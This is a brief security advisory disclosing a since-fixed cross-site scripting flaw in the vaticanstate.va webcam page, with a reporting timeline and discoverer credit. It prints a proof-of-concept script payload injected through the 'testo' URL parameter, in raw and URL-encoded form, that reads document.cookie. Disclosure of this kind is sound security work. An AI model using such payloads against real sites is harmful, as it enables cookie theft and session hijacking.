The Vatican vaticanstate.va webcam page suffered from a cross site scripting vulnerability.
a8894f1b1dd5890c9866d2426fdde5123f882692bbd5b0645b0fea35e9fbd003
* vaticanstate.va XSS Vulnerability webcam page
* ========================================================
*
* Site: http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================
Report-Timeline:
----------------
2011-03-07: Notification to vaticanstate.va
2013-06-30: Fixed, but no answer received.
Description:
------------
the vulnerability was in the webcam page "page/index?cam=webcam[0-9]" by sending an
HTTP GET request with the variable "testo" containing Javascript or HTML code.
Example (url-decoded):
http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3&testo=</span></div><script>alert(document.cookie)</script>
XSS URL (now fixed):
--------------------
http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3&testo=%3C%2Fspan%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Screenshot XSS Vulnerability before fix:
----------------------------------------
http://goo.gl/Jv8XJ
CREDITS:
---------
This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.